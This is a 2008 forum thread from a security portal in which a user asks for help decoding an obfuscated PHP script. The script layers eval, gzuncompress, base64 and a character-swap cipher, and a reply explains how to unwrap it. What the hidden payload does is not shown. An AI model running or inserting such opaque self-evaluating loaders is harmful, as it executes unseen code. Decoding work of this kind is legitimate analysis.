Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 570
Members: 0
Total: 570
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PHP script decode requests -> need help with base64 code
Post new topic  Reply to topic View previous topic :: View next topic 
need help with base64 code
PostPosted: Sun Oct 19, 2008 2:09 am Reply with quote
safety
Beginner
Beginner
 
Joined: Oct 19, 2008
Posts: 2




hi

i want make decode for

$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=180;eval(gzuncompress(base64_decode('eNplj1lrwkAcxL9MILs00tWmUQl5qPe93tdLSbL/HJrL3Rzqp2+kpUXKzNMw84ORKCGEliKGEycQIYlS+h0oMrdkrBeeHwCqVCT6KD6MHRdSgaTfqVIlNRXr/2KVNDWsl8SfpeHes8iOw4SDEMgyBWjqJwM7ZoBEylOOHA4me0LUNazIH2bLatsd1oWe03cH3tAfncbnSTANZxGN58nisuQrsU432TbfFfvr4Xa8k2rtTX3X6o3my6shl4xWu9Pt9QfD0XgyndH5Yrlab7a7/eFoWjYDx/X80zkIozi5cJFmeXG9PTFkjLEOuRmgv0NY/wLkMV8l')));return;?>
PgVgKOsXYSAG/mKuISVRURiwFk1MehNoqd25iBcyZejeYWZCAc/pUkkkPVxWR+3t52OnP/Fos4IHy1cUYISzzTiuoyDmFEQuGBMuRUwasTM+EfgrUQxaLyiCnSEAMMMUdaeGYKK8IrIeCpocSrSKy1yceQDnALEAVcictKTzkO74tGpxTuNTViv7WiUB1YE7jDZRINqi8gjvQDWuK/S3wFikF5eJzaVDvt95DJrWfAUyWi2q3neN3KdjWViOiWVUATnUk9gkCPmXs5L3IT8qn7tQiB7ErcgHmM+B7OumQp/XZx3G0lKse1lw2vnXggYTwfz2vXg3OP+rxy+IMjAFrORGy4OetnEmtZPf4zeotontzKk/PdzFhyoPlw/XwnESHDv1ivhk7ti7/OcYmerrZlI2lZyl6429okzYor7+2eGQrHEbmjY5uVpzdY7yE0KuPQ6eDgYEkMuYwEt8PyNs+ASIB6AaPguwzG0FQzAIaHa7UJ+yafiIyhRbRCj6dVLdiijCQyAWwD/xzSfJI3v7TesoY96y9/zgVJI30Sm3WWadKAcxIIOOVdJ0R1uQCpjAA53PcmAPvVENTAKgGFdjRHS2lB/T2e1q/8zN7cKUna3KukCpCaGn0GJSJq781t/TmkvDb9EgeYHWiEE=


i see thes topic and when i make


<?php
error_reporting(E_ALL);

$x = gzuncompress(base64_decode('eNplj1lrwkAcxL9MILs00tWmUQl5qPe93tdLSbL/HJrL3Rzqp2+kpUXKzNMw84ORKCGEliKGEycQIYlS+h0oMrdkrBeeHwCqVCT6KD6MHRdSgaTfqVIlNRXr/2KVNDWsl8SfpeHes8iOw4SDEMgyBWjqJwM7ZoBEylOOHA4me0LUNazIH2bLatsd1oWe03cH3tAfncbnSTANZxGN58nisuQrsU432TbfFfvr4Xa8k2rtTX3X6o3my6shl4xWu9Pt9QfD0XgyndH5Yrlab7a7/eFoWjYDx/X80zkIozi5cJFmeXG9PTFkjLEOuRmgv0NY/wLkMV8l'));

file_put_contents('./step1.txt', $x);
die("ok");
?>

i get in



step1.txt

$O000O0O00=fopen($OOO0O0O00,'rb');while(--$O00O00O00)fgets($O000O0O00,1024);fgets($O000O0O00,4096);$OO00O00O0=gzuncompress(base64_decode(strtr(fread($O000O0O00,476),'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);


i dont know what i do after that


plz some help
View user's profile Send private message
PostPosted: Sun Oct 19, 2008 5:58 am Reply with quote
mge
Valuable expert
Valuable expert
 
Joined: Jul 16, 2008
Posts: 142




the contents of step1.txt are now what you can replace with the eval() in the script.
note that the script reads the script file itself into the script to process the third line. so you have to find a way to modify the source to read the original script Smile
View user's profile Send private message
PostPosted: Sun Oct 19, 2008 9:59 pm Reply with quote
safety
Beginner
Beginner
 
Joined: Oct 19, 2008
Posts: 2




can any one help me to know how decode thes code !!~!!
View user's profile Send private message
need help with base64 code
  www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.148 Seconds